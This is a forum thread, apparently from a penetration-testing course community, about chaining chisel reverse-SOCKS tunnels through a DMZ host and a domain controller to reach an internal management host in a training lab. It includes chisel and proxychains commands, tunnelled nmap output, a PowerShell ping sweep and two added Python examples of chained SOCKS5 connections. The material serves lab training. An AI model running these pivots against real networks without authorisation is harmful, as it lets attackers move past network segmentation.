Attacking Enterprise Networks: Double Pivot using Chisel

Hello,

At the end of “Attacking Enterprise Networks” the module “Post-Exploitation” describes how to set up MSF autoroute to perform a double pivot and proxy traffic over 2 intermediate hops:

`Attack host` --> `dmz01` --> `DC01` --> `MGMT01`

I am currently trying to figure out how to perform the same task with chisel through installation of a client / server process on the DMZ jump host.
Is there anyone who has tried that out successfully?

Many thanks!

I CANNOT get it to work with meterpreter at all, I’ve been on it for ages.

3 Likes

I ended up setting up a port forward on DC01 with netsh in the end.

Tried several configurations in the Lab Environment and finally got a Chisel Double Pivot to work!

We are connecting via
Kali (10.10.14.227) <<10.10.14.0/24>> DMZ01 (10.129.58.6 | 172.16.8.120) <<192.16.8.0/24>> DC01 (172.16.8.3 | 172.16.9.3) <<172.16.9.0/24>> MGMT01 (172.16.9.25)

On our local Kali:

./chisel_linux server --socks5 -p 9001 --reverse

/etc/proxychains

socks5 127.0.0.1 9999
socks5 127.0.0.1 8888

DMZ01:

./chisel_linux client 10.10.14.227:9001 R:9999:socks
./chisel_linux server -p 9002 --reverse --socks5

DC01:

chisel.exe client 172.16.8.120:9002 R:8888:socks

Now close any Socks4 connection (e.g. SSH Dynamic Port Forward) and comment it out in /etc/proxychains:

#socks4 127.0.0.1 9050

Scan Target MGMT01 via socks5 proxy:

┌──(kali㉿kali)-[~]
└─$ proxychains nmap -sT -p 22 172.16.9.25
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-11 17:27 EST
[proxychains] Strict chain  ...  127.0.0.1:9999  ...  127.0.0.1:8888  ...  172.16.9.25:80 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:9999  ...  127.0.0.1:8888  ...  172.16.9.25:22  ...  OK
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 172.16.9.25
Host is up (14s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 16.31 seconds
18 Likes
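The two socks5 lines in the proxychains configuration above form a strict chain: proxychains connects to the first listener (9999, the one chisel forwards to DMZ01), asks it to CONNECT to the second (8888, forwarded to DC01), and then runs the second SOCKS5 handshake inside that tunnel, ending with a CONNECT to MGMT01. The script below is an added example, not the poster's setup and not chisel's code: it reproduces that chained handshake on loopback with two minimal SOCKS5 servers (NO AUTH, CONNECT only) and an echo service that stand in for the chisel listeners and for MGMT01, and it shows how a port with nothing behind the last hop (the 172.16.9.25:80 "socket error or timeout" line in the nmap output) surfaces as a non-zero SOCKS reply code. All addresses and ports are constructed for the demo.

```python
"""Chained SOCKS5 CONNECT, which is what proxychains' strict_chain does with two
socks5 entries. Added example, not the poster's setup: two tiny SOCKS5 servers
and an echo target on loopback threads stand in for chisel and for MGMT01."""
import socket
import struct
import threading
from contextlib import suppress
V5 = 5

def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during SOCKS5 exchange")
        buf += chunk
    return buf

def socks5_connect(sock, host, port):
    """NO AUTH SOCKS5 CONNECT on an open socket; returns the reply code (0 = ok).
    The socket then carries bytes to host:port, so the next hop's handshake fits on top."""
    sock.sendall(bytes([V5, 1, 0]))                  # greeting: one method, NO AUTH
    ver, method = _recv_exact(sock, 2)
    if ver != V5 or method != 0:
        raise ConnectionError("proxy refused NO AUTH")
    name = host.encode()                             # ATYP 3 = name form
    sock.sendall(bytes([V5, 1, 0, 3, len(name)]) + name + struct.pack("!H", port))
    _ver, rep, _rsv, atyp = _recv_exact(sock, 4)
    # drain BND.ADDR/BND.PORT so the stream stays aligned for the next layer
    _recv_exact(sock, ({1: 4, 4: 16}.get(atyp) or _recv_exact(sock, 1)[0]) + 2)
    return rep

def chain_connect(hops, target):
    """Strict chain: hop1 CONNECTs to hop2, ..., the last hop CONNECTs to target."""
    sock = socket.create_connection(hops[0], timeout=5)
    for nxt in list(hops[1:]) + [target]:
        rep = socks5_connect(sock, *nxt)
        if rep != 0:
            sock.close()
            raise ConnectionError(f"CONNECT to {nxt} refused, reply code {rep}")
    return sock

def _pipe(src, dst):
    """Copy bytes one way until EOF, then half-close the other side."""
    with suppress(OSError):
        while data := src.recv(4096):
            dst.sendall(data)
    with suppress(OSError):
        dst.shutdown(socket.SHUT_WR)

def _reply(sock, code):
    sock.sendall(bytes([V5, code, 0, 1]) + b"\0" * 6)  # BND.ADDR 0.0.0.0:0

def _socks5_handler(client):
    """Server side: accept NO AUTH, honour CONNECT to a name-form target."""
    with client, suppress(ConnectionError):          # client is closed on exit
        _recv_exact(client, _recv_exact(client, 2)[1])   # greeting: skip offered methods
        client.sendall(bytes([V5, 0]))
        _ver, cmd, _rsv, atyp = _recv_exact(client, 4)
        if (cmd, atyp) != (1, 3):                    # only CONNECT + ATYP 3 supported
            return _reply(client, 7)
        host = _recv_exact(client, _recv_exact(client, 1)[0]).decode()
        port = struct.unpack("!H", _recv_exact(client, 2))[0]
        try:
            upstream = socket.create_connection((host, port))
        except OSError:
            return _reply(client, 5)                 # 5 = connection refused
        _reply(client, 0)
        back = threading.Thread(target=_pipe, args=(upstream, client), daemon=True)
        back.start()
        _pipe(client, upstream)
        back.join()                                  # let the reply direction drain too

def _listen(handler):
    """Serve each connection to an ephemeral loopback port on its own thread."""
    ls = socket.create_server(("127.0.0.1", 0))
    def accept_loop():
        while True:
            conn, _ = ls.accept()
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=accept_loop, daemon=True).start()
    return ls.getsockname()

def demo():
    """Run the chain on loopback; returns (echoed bytes, error text for a closed port)."""
    target = _listen(lambda c: _pipe(c, c))          # echo service, stands in for MGMT01:22
    hops = [_listen(_socks5_handler), _listen(_socks5_handler)]   # like 9999, then 8888
    sock = chain_connect(hops, target)
    sock.sendall(b"ping")
    echoed = _recv_exact(sock, 4)
    sock.close()
    # nothing behind the last hop => non-zero reply code ("socket error or timeout")
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))                     # bound, not listening: refuses connects
    try:
        chain_connect(hops, probe.getsockname())
        return echoed, None
    except ConnectionError as exc:
        return echoed, str(exc)
```

Calling demo() returns (b"ping", "CONNECT to ('127.0.0.1', N) refused, reply code 5"): the first element proves the two-hop tunnel carries traffic end to end, the second shows the failure mode for a closed target port. The same layering is why a dead entry earlier in the ProxyList breaks everything under strict_chain: each hop only ever talks to the next one.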

This saved my bacon! Thank you! I could not get metasploit to work for some reason. I also much prefer chisel.

1 Like

Great I could help with that!
Although MSF autoroute was working for me, the connection was very unstable and it would die at regular intervals. Then I had to do the whole setup in MSF again. With Chisel it is much less of a hassle…

Although I have not yet tried it, it should be possible to extend the chain beyond 2 hops in that configuration!

Weird part was MSF was working a couple weeks ago. But following the same steps I couldn’t ever get it to work this week. I could get everything except the connection to MGMT01 to work with MSF.

Were you able to gain access to MGMT via Meterpreter? I followed the steps to a “T” to obtain the double-hop port forward, and I am getting port 22 closed for 172.16.9.25; when I do a ping sweep, no other IPs show as alive other than the DC. My question is: is it how I have my proxy set up that is causing this error? I cannot figure this one out. I would be grateful for any hint.
Thank you

Hi,
Yes, when I was doing the module 6 months ago, I was able to reach MGMT via Metasploit Autoroute.
Provided nothing has been changed in the lab setup, it should still work if you follow the exact steps shown in the module text.
However, I found this setup extremely unstable. Very often, the second reverse shell from Windows machine 1 back to the Linux Host would die (especially when using connection heavy tools such as CME). Then you have to repeat all the necessary steps to get another connection.

In short: Yes, it should work!

This post was very very helpful in my training for OSCP, thank you for your explanation. You’ve greatly improved the quality of my notes.

1 Like

This is an epic effort, great work!

Did you figure this out? I’m getting 22 closed as well, and not showing other hosts as alive…

Just wanted to say thanks for the info!! It was most definitely needed!

Thank you bro, I’m doing Dante Pro Lab right now, and there I also had to use Double Pivot, and your guide really helped :heart:

Thanks so much, was getting so frustrated with this final challenge. Always annoying when it does not work as shown in the course…

You resolved the issue, man… this post should be included in the course… the content in the course has a lot of issues… instability and conceptual confusion…

Hey guys, I am unable to discover the last host (the one on the 172.16.9.1/24 subnet). I am using a standard ping sweep from DC01:

1..254 | ForEach-Object {"172.16.9.$($_): $(Test-Connection -count 1 -comp 172.16.9.$($_) -quiet)"} | Out-File -FilePath "output.txt"

With this command I am getting only a hit on 172.16.9.3 which is the DC01 host itself.
Anyone know what the problem might be?

I had the same issue. In my case I repeated the ping sweep a couple of times and it worked. You should see the same additional host as in the course steps.

Generally, this specific lab is highly unstable connection-wise, which in turn requires multiple tries to be sure whether something is not correct or the network failed.

“Stealing” the idea from our friend Rapunzel3000, you can make the metasploit setup work if you go to ‘/etc/proxychains’ and comment out the line we set up for the initial ssh pivot connection:

#socks4 127.0.0.1 8081

But do not close the SSH pivot connection. It will kill all connections using it and of course the dependent meterpreter sessions.

After that, the scan is successful (port 22 open) and access to the server is achieved.

1 Like
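Both this post and the chisel write-up above come down to the same check on /etc/proxychains.conf: under strict_chain every line in [ProxyList] is used in order, so a leftover socks4 entry from an earlier ssh -D pivot sits in front of the real hops and breaks the chain even though the pivots themselves are fine. The following parser is an added example, not the thread's or proxychains' code; the config text it reads is constructed to resemble that situation, and the keyword and entry syntax follow the proxychains.conf format (chain mode keyword, a [ProxyList] section, one `type host port` entry per line, '#' comments).

```python
"""Parse a proxychains.conf and flag hops that do not belong in the chain.
Added example, not from the thread; SAMPLE_CONF is constructed to look like
the state after 'ssh -D' was used earlier and two chisel socks5 entries were
appended."""
import re

CHAIN_MODES = {"strict_chain", "dynamic_chain", "random_chain", "round_robin_chain"}
ENTRY = re.compile(r"(socks4|socks5|http)\s+(\S+)\s+(\d+)(?:\s+\S+\s+\S+)?")  # type host port [user pass]

SAMPLE_CONF = """\
# constructed sample: the socks4 line is the old ssh -D pivot, the socks5 lines are the chisel hops
strict_chain
proxy_dns
[ProxyList]
socks4 127.0.0.1 9050
socks5 127.0.0.1 9999
socks5 127.0.0.1 8888
"""

def parse_proxychains(text):
    """Return (chain mode, [(type, host, port), ...]) for the active ProxyList entries."""
    mode, hops, in_list = "strict_chain", [], False     # strict_chain is the proxychains default
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()              # '#' comments and blank lines are ignored
        if not line:
            continue
        if line == "[ProxyList]":
            in_list = True
        elif not in_list:
            if line in CHAIN_MODES:
                mode = line
        elif m := ENTRY.fullmatch(line):
            hops.append((m.group(1), m.group(2), int(m.group(3))))
    return mode, hops

def stale_hops(text, intended):
    """Return (mode, active hops that are not in the intended chain).
    Under strict_chain every listed proxy must answer, in order, so one leftover
    entry in front of the real hops makes every proxied connection fail."""
    mode, hops = parse_proxychains(text)
    return mode, [h for h in hops if h not in intended]
```

Running stale_hops(SAMPLE_CONF, [("socks5", "127.0.0.1", 9999), ("socks5", "127.0.0.1", 8888)]) reports the socks4 9050 entry as the odd one out; once that line is commented out, the same call returns an empty list, which is the state both posts describe as working.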

Hey guys, has anyone been able to run Metasploit over the double chisel pivot? I have found that while the double chisel pivot works, many tools have a very hard time working with it. For example, Burp Suite, gobuster, ffuf, metasploit. I know how to set up metasploit with a single socks proxy but I have no idea how to do 2. If anyone knows, please share.